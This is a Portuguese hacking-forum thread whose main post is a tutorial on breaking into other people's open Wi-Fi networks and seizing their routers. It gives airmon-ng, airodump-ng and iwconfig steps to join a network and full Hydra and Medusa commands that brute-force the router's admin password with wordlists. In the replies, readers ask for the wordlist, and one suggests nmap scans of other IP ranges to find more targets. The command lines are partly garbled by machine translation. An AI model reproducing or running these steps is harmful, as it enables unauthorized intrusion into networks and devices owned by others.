Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadindo Roteador

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invadindo Roteador

    Bom irei postar um tópico criado por um amigo meu chamado Lince então os créditos são dele .



    Como invadir o roteador e tomando controle total da rede wireless



    vamos la

    nesse tutorial eu utilizei uma versão do linux

    o backtrack 4 mas vc pode usar o velho windows com programas de brute force

    detalhes

    a autenticacao tem q estar aberta

    e o dhcp ativado



    passos resumidos:

    indentificar a rede

    ter acesso a rede

    obter um endereço ip

    verificar o gateway

    verificar o caminho da pagina de configuracao do roteador

    iniciar Hydra/ Medusa usando wordlist para o login e senha caso o login não seja conhecido(no caso os default)



    vamos la:

    primeiro comando

    airmon-ng

    airmon-ng start wlan0 ng airmon-start wlan0

    airodump-ng mon0 -t opn airodump-ng opn mon0-t



    ficará assim:







    o segundo comando:



    ifconfig wlan0 down

    iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão

    iwconfig ap 00:134:09:32:60 iwconfig ap 00:13: D4: 09:32:60

    ifconfig wlan0 up ifconfig wlan0 up



    preste atenção na imagem você ira entender!









    Verificar a conexão

    iwconfig wlan0 iwconfig wlan0







    Obter um endereço IP e gateway de seleção

    dhclient wlan0 dhclient wlan0













    Antes de mais nada verifique

    os logins padroes do roteador







    caso não encontre

    você vai parar nessa pagina que esta na foto acima

    -----------------------------------------------------------------------------



    Então caso tenha tentado e não tenha conseguido vamos la...você ira precisar de uma word list eu uso o dicionario do broffice muito bom.

    Começando Hydra para quebrar o login router / senha.

    -L specifiying the path to login list -L especificando o caminho para login lista

    -P specifying the path to password list -P especificando o caminho para a lista de senhas

    -t limiting the number of connections T limitar o número de conexões

    -e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha

    -f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado

    -V to show each login/password attempt -V para mostrar cada login / tentativa de senha

    http-get to specify the protocol to use http-get para especificar o protocolo a ser usado

    /index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para



    hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp hydra 192.168.1.1-L / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-V http-get / index.asp

    -----------------------------------------------------------------









    ---------------------------------------------------------------------

    Para Medusa

    -H para especificar o host

    -U to specify path to the login wordlist -U para especificar o caminho para a wordlist login

    -P to specify path to password wordlist -P para especificar caminho para wordlist senha

    -t to limit the number of connections -T para limitar o número de conexões

    -f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password

    -v for a more verbose output -V verbose para uma saída mais

    -M to specify the module to use -M para especificar o módulo para usar

    -m to specify the options for the module in use -M para especificar as opções para o módulo em uso



    medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp medusa-h 192.168.1.1-U / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-v 5-M m DIR-http: GET / index.asp












  • Font Size
    #2
    Obrigado por compartilhar.

    WCG 147
    sigpic

    Comment


    • Font Size
      #3
      Post interessante. Muito obrigado.

      Ainda sou um mero iniciante nessa área, então tenho uma dúvida: A invasão quebrou qual protocolo de segurança, WAP ou WEP? Não identifiquei no post, caso esteja lá, desculpem-me!

      Comment


      • Font Size
        #4
        estou precisando dessa wordlist, tenho 3 listas mas nao quebra a senha, vc teria o link desse dicionario do broffice?
        Seja Curioso | Conhecimento nunca é demais | Não tenha Preguiça

        Comment


        • Font Size
          #5
          Gostei de ver, mais um para a coleção! agora tem uma rede sem fio aqui que extremamente quase impossivel de entrar, pq ela usa o mac para se conectar e ai lasca!
          Se você é fã! Use!
          _ - _ _ - _ _ - _ _ - _
          .

          Comment


          • Font Size
            #6
            Ola. muito bom. parabens a vc e ao lince!
            Tenho uma duvida, como consigo esse dicionario?

            Comment


            • Font Size
              #7
              Post bastante interessante. Estava mesmo precisando. Vlw cara!

              Comment


              • Font Size
                #8
                Judith Ann Mcdermott

                Thank you for the blog post. Jones and I have been saving for a new e-book on this issue and your blog post has made all of us to save money. Your thoughts really answered all our issues. In fact, more than what we had thought of prior to when we came across your great blog. I no longer have doubts including a troubled mind because you have really attended to our own needs in this post. Thanks

                Comment


                • Font Size
                  #9
                  Hair Treatment

                  Thanks for all of your work on this web page. I am looking forward to reading more of your posts in the future.

                  Comment


                  • Font Size
                    #10
                    Parabéns pelo compartilahmento

                    Comment


                    • Font Size
                      #11
                      pergunta

                      Essa parte de descobrir a senha do roteador funciona para redes externas?
                      Caso sim, poderiamos usar essa técnica juntamente com o nmap identificando roteadores na região.

                      Comment


                      • Font Size
                        #12
                        dicas

                        Sim ...
                        Cara vc pode fazer uma varredura na sua própria faixa de ip, use o nmap e manda esses comandos no nmap -sV -p 80 -T4 -v boa sorte.


                        DE NADA!!!

                        Comment

                        X
                        Working...
                        X